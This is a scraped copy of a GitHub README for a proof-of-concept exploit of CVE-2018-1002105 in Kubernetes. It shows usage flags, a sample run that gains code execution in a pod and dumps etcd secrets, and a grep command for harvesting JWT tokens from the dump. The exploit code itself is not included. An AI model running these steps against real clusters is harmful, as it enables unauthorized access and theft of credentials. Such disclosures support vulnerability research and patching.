43
GitHub - evict/poc_CVE-2018-1002105: PoC for CVE-2018-1002105.
source link: https://github.com/evict/poc_CVE-2018-1002105
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
CVE-2018-1002105 PoC
Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires create and get privileges on pods and pods/exec. If you do not know what that means, this is probably not meant for you. :)
The current PoC dumps the secrets from the default etcd-kubernetes container.
Demo
The PoC in action:
Usage
usage: poc.py [-h] --target TARGET [--jwt TOKEN] [--namespace NAMESPACE] --pod
POD
PoC for CVE-2018-1002105.
optional arguments:
-h, --help show this help message and exit
--target TARGET, -t TARGET
API server target:port
--jwt TOKEN, -j TOKEN
JWT token for service account
--namespace NAMESPACE, -n NAMESPACE
Namespace with exec access
--pod POD, -p POD Pod with exec accessExample:
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] [*] Building pipe... [+] Pipe opened :D [*] Attempting code exec in pod [*] Dumping secrets in etcd.db.... [+] Done dumping secrets!
Check for tokens:
$ grep -air eyJ etcd.db
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK